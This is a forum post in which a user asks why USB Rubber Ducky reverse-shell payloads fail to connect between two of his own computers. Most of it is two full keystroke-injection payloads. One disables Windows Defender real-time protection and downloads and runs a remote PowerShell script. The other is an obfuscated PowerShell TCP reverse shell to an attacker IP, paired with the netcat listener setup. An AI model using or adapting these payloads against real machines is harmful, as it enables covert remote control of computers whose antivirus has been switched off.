Problem with Reverse shell - No connection


Dominik75

Hello forum members,

Following YouTube videos on "Get a Reverse Shell with the USB Rubber Ducky", and downloading payloads from https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and the REVERSEDUCKY loads, I could not get any of the payloads for remote access to work properly. I did everything as in the videos and used the payloads included on the Hak5 website. Both computers are on the same network. I put a Rubber Ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works (python -m http.server 8000, and in the second panel nc -l -p 4444), I unfortunately cannot connect to Windows through the shell. Payload.ps1 is on the server, of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips. Sample loads:

REM Turn off Windows Defender and start reverse shell
REM
DELAY 1000
GUI r
DELAY 200
REM Start an elevated powershell instance which will disable Windows Defender.
STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs
ENTER
DELAY 1000
REM if you need administrator [left, enter and delay 1000]
LEFT
ENTER
DELAY 1000
ALT y
DELAY 1000
GUI r
DELAY 100
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');"
ENTER
STRING exit
ENTER

Another payload:

REM       ReverseDucky2
REM       Version 1.3
REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM       Author: 0iphor13

REM       Reverse shell executed in the background
REM       Fill in Attacker-IP and Port in Line 19
REM       DON'T FORGET TO START LISTENER


DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 250
ENTER

DELAY 200
STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s
DELAY 100
STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt
DELAY 100
STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
DELAY 100
ENTER
